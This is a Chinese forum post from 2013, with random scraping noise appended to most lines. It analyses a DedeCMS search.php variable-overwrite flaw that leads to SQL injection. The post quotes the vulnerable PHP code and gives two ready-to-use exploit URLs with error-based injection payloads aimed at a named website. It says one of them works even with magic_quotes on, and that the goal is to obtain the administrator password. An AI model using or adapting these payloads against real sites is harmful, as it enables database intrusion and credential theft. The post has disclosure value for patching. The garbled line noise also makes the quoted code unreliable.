微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.% N6 R$ v& ?7 Y: l. `
作者: c4rp3nt3r@0x50sec.org
5 y# A9 d. @' v! l8 S X( FDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.' t8 O+ Q* j- }5 { T, A
9 F% Z7 e! i/ \; f
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
- Q0 W- I: l" M# _ ( }# \8 U+ [$ v7 |
============
8 `5 r1 O+ Z5 I. U8 [, E : F b/ H6 l0 q3 X% B, c8 H
3 A$ \0 F2 C, r6 [/ g- _% @
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
5 z' p/ t6 z6 z* H, Y+ s * {" ^0 k/ `$ W" N
require_once(dirname(__FILE__).”/../include/common.inc.php”);
+ f* `9 I9 I) m% n8 F, yrequire_once(DEDEINC.”/arc.searchview.class.php”);
% a- l4 P, G2 f* D # Q6 m8 m6 m! D$ j# D
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;, E" f# Y- Q" J$ H
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;* N$ h7 ^9 c/ ]: ~
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;) @0 p8 r" Z: S0 x J: z
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;% `- W3 [! g- f/ h
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
/ `' T2 [( A) ?1 g0 ~ , E, p" i! V% z9 d% @: H
if(!isset($orderby)) $orderby=”;6 B/ j( d! R, Q% Y
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
p: H9 B% E T 1 D9 ^9 R" m8 @
; t! O0 p8 N/ y/ r; p8 M1 J$ G' @5 d
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
( `1 ]8 L7 l: `else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
- X( b2 q- `% i$ R 6 B6 M3 q# @/ F0 {% ^6 x0 N: C. ~
if(!isset($keyword)){$ W% r1 O7 c5 H( d, |0 b
if(!isset($q)) $q = ”;
9 ]2 }' l/ A: f j% e $keyword=$q;1 h- T$ T3 T) F/ M$ h8 h
}
9 x1 g& T- c7 `4 [ 1 ]9 H& ?; r( F0 Y
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
- z* V# d* e* ~ b
( v9 s1 ?; k: J* Y5 U//查找栏目信息* s: v; ?% X$ B/ K8 O
if(empty($typeid))
% \! x8 b( O9 J& g! _{
F1 B5 H/ o+ N+ h' p" P% d $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;/ W1 ]8 I I; [3 G; s
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
& C! H* X; j, ^" q" k {
& z" K' |# h, L9 |* L3 ~; [ $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);5 b0 B- ^1 F" _1 n6 _* L0 O
fwrite($fp, “<”.”?php\r\n”);
6 ?# {* O' \6 h4 w2 f" G8 m6 r+ X/ s $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
8 {! k7 m' p0 b4 V* o F $dsql->Execute();
5 g: k0 m! ~% W while($row = $dsql->GetArray())+ H+ P0 s4 d& C; s* i( y+ U7 }2 L* T
{0 R6 B1 z" W6 t) c/ v
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
8 q4 r# K' @ @- M! } }: `, r. x0 y+ h8 g
fwrite($fp, ‘?’.'>’);( p% y. i9 P' z( e1 _# A/ q
fclose($fp);2 |" B5 e/ h6 a) |* k
}
# f) o& i* e6 A8 C //引入栏目缓存并看关键字是否有相关栏目内容; _1 V, P7 I3 I1 g3 |& u, i
require_once($typenameCacheFile);
0 \. e- I8 g, z R//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
6 I- [& x+ h8 v) p. g//
6 a5 S3 v) ^8 q6 b! { if(isset($typeArr) && is_array($typeArr))+ D2 \) f- }* H* N' O) B# T
{( h. \) @! ~/ L! l7 Q' f" ]; {" K
foreach($typeArr as $id=>$typename)- r; A/ Z& d: S/ {/ F7 P
{
. f4 g1 N7 {) L2 V9 Z; `
- e2 y& ^( w" Z; X' b( j/ `' g <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过& ? V3 _% ^6 ?' v0 S; _% T
if($keyword != $keywordn)( |. h! [" ~! X) ?% P+ T
{$ H9 }0 _. i0 |# y8 Q
$keyword = $keywordn;- C! j0 Q- p$ O: N6 ^
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
H+ F; _; W+ \ break;
) F4 m$ I) }1 |5 U }9 z, f1 `3 P2 \8 o
}2 A% U9 T+ a' O1 E q
}* @4 E/ L; f: N$ x" B
} M8 B2 _4 x, p1 C4 M
然后plus/search.php文件下面定义了一个 Search类的对象 .9 u) i* U' P4 L3 G- B
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
- G) T' ?0 E! f1 Y3 d+ r) E$this->TypeLink = new TypeLink($typeid);
- g; q) ?! j+ Y8 Z1 M* v% j 7 Z9 ^ _' O. S; p) I6 f
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句./ @+ v9 T6 t+ L
6 W, c: q& x* d eclass TypeLink
* A: I0 S5 v3 e8 h1 N9 Y6 b0 M. R2 c{
, X% U: ]( q. \$ O4 T, { |8 K var $typeDir;, J" J" d& a) I
var $dsql;" q2 O7 h/ H9 Y9 J: {
var $TypeID;% I5 D+ J- B5 k+ \7 F3 P
var $baseDir;
! j" O3 L$ T9 g var $modDir;
# K& H6 K+ q9 v, D/ {1 T1 [2 _5 ` var $indexUrl;
- n( k9 v0 J2 X P# |. D2 b var $indexName;' g8 O7 [& @) H R
var $TypeInfos;4 S, p: _: Z/ r/ U4 D' t: J
var $SplitSymbol;5 t+ L6 @( c5 l* r K. s7 H
var $valuePosition;) i& q6 b- D& |2 x) X& D, f
var $valuePositionName;
* n) ~& E$ \0 X0 R( s6 l( s$ O! U& X var $OptionArrayList;//构造函数///////
& V' k- i% d3 a) v //php5构造函数' ~% ?. F4 K/ _2 m- W3 {
function __construct($typeid): V, b/ |* U1 P& M H
{) U- K; j1 u- ?" h' d; l
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
, D8 m& u/ u9 D( [8 n+ }* } $this->indexName = $GLOBALS['cfg_indexname'];5 [4 d% S9 x# y9 D
$this->baseDir = $GLOBALS['cfg_basedir'];
$ L2 p4 H! g" W* d) J) i2 t $this->modDir = $GLOBALS['cfg_templets_dir'];3 z7 C& h; Z ?8 q+ S
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
% M ~' t3 I- \4 ?. `: `; T5 v5 f $this->dsql = $GLOBALS['dsql'];
$ ] p# e2 w6 c! {% [/ f) v Q. z4 a $this->TypeID = $typeid;, }9 t9 \( k& H- s$ a7 k- l
$this->valuePosition = ”;3 \1 L: t" p2 w; ]3 A
$this->valuePositionName = ”;
" s9 T7 ]; u, _- y: \ F2 [, j $this->typeDir = ”;
$ X) @! x( A4 K$ Q, W/ I) B $this->OptionArrayList = ”;* w1 ^6 {9 a6 Z9 _
4 `$ H& Q4 j5 F
//载入类目信息
! F+ z7 w7 a+ T7 e; }9 k) A1 C
: U0 [( }- p0 Z; p/ C <font color=”Red”>$query = “SELECT tp.*,ch.typename as8 U, N3 ~9 e; T
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
. V& O0 ~( G( w u: M5 U3 W/ n! b# n`#@__channeltype` ch
3 | l0 t1 G8 r2 n% _* I! s: x. R on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
/ t. O1 @+ {, G. i7 g/ t
' o4 @. v* I3 a7 _& ?( M if($typeid > 0)9 ], D0 Q0 u7 w9 o5 b
{6 ?+ h4 U2 R2 H5 |
$this->TypeInfos = $this->dsql->GetOne($query);
/ ?+ m- B8 c8 e# b" D利用代码一 需要 即使magic_quotes_gpc = Off
* O8 m3 X8 t& ~4 e- q: s
4 Q0 Z& k1 H" p2 ?# T. \2 a) k U, twww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title* J% }( O9 @! O" u$ p# j
, c+ f, T( Y8 B3 t
这只是其中一个利用代码… Search 类的构造函数再往下
+ p J1 V3 o+ p/ E) z# h
2 Z% O: W: \+ \% W' a$ u……省略4 }- j- ~" y* m( G
$this->TypeID = $typeid;8 G' E) l a j/ }5 w; f% j
……省略
+ O8 f8 a+ I' ]- M/ ~- {6 ^if($this->TypeID==”0″){
9 M# w% J2 a- W7 C1 w5 r $this->ChannelTypeid=1;, k, z0 a6 f, D! W' _
}else{
: H1 L5 D0 `6 U/ Y $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
j, J) Q3 F6 f3 D8 |, S//现在不鸡肋了吧亲…" q6 \9 B. g" K* i
$this->ChannelTypeid=$row['channeltype'];
% R$ i& j. p4 |% |9 l6 j/ w
- r1 l3 L( E/ h0 s4 ], w3 y }+ a; ]7 w1 p' w( P
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.7 ?1 P7 R" e; K+ H# Y
; H# Q7 B/ \9 ~9 j: p2 D
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
4 D1 g4 Y+ \9 k
9 k$ Z4 b$ B* m( l* x如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
- ?' j8 B( i7 S+ Z$ G |
发表于 2013-1-19 08:18:56
收藏
支持
反对